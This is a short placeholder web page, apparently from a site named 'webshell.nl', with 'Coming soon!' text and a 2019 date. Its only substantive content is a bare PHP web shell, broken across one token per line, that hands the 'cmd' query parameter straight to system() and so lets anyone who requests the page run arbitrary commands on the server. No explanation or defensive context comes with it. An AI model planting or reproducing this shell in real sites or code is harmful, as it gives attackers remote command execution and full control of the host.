webshell.nl
About
Coming soon!
Oct 23, 2019
Coming soon!
<?php
if
(
isset
(
$_GET
[
'cmd'
]))
{
system
(
$_GET
[
'cmd'
]);
}
?>